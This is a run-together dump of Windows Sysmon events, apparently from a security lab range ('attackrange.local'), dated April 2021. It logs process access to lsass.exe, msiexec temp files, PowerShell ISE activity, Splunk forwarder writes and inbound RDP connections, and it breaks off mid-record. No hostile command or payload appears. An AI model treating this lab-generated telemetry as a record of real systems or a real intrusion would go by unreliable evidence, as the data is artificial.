14:55:59.047{A7A01FEF-B624-607E-0A00-00000000BB01}8524336C:\Windows\system32\services.exe{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000072305Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.052{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\system32\msiexec.exe /VC:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9,IMPHASH=18A9F87944C357EB02511FDF4A18E19B{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x800000000000000072304Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.047{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072303Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.047{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072302Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.047{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072301Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:59.047{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000049933Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.356{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58594-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049932Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:59.621{85C0FFC9-B7ED-607E-1100-00000000BB01}1000NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=469749078F1AE8176213728BB031ADEA,SHA256=9246E35EB1136C4F7A0D6910EF65CEDD8AF90250BEBEE6AAE6C20C54A4ECBDB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049931Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:59.543{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CE0378BD067B10CDAAAFDD0E11928EA9,SHA256=769513646DB2BE26A26CFDDE105C614444A2582CC178FAE79BD3E03A84E330BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049930Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:59.481{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A69BABE93C7329DF5A7FD40E00C4AFF0,SHA256=45ED2D36608BC81D7673A18BBDA4FA136A9EBB2F77C54ED4BD6C3B2DAB98E2FC,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000072346Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:58.804{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57514-false10.0.1.12-8089- 23542300x800000000000000072345Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:00.329{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI86E1.tmpMD5=FCCDC45CA17E5180B40EFC28052BAC39,SHA256=4AB37B0F9C5FE3505E1ECFE0764AAA04838CF81F9E0A402425E057F7A251E621,IMPHASH=620AD7AB8901854C91622E052544AEE7truetrue 10341000x800000000000000072344Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:00.219{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+d7a69|C:\Windows\System32\SHELL32.dll+d7a09|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+58ac4|C:\Windows\System32\SHELL32.dll+58807|C:\Windows\System32\SHELL32.dll+554f5 10341000x800000000000000072343Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:00.219{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+5c6b3|C:\Windows\System32\SHELL32.dll+57217|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072342Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:00.219{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072341Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:00.219{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072340Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:00.219{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072339Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:00.219{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000072338Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:00.141{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI86A2.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072337Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:00.079{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Windows\Temp\WIN-DC-339-20210420-1456.logMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049948Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:58.931{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60068-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049947Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:00.529{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DDF2CD7FB48BE70A0ADF4A64E18613B,SHA256=2F84FD4021BAB47EDE904F286C52023F56294F9066E404BB9AE2AA9AF5381003,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000049946Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:00.169{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB80-607E-E106-00000000BB01}3984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049945Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:00.169{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049944Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:00.169{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049943Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:00.169{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049942Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:00.169{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049941Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:00.169{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049940Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:00.169{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049939Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:00.169{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049938Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:00.169{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049937Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 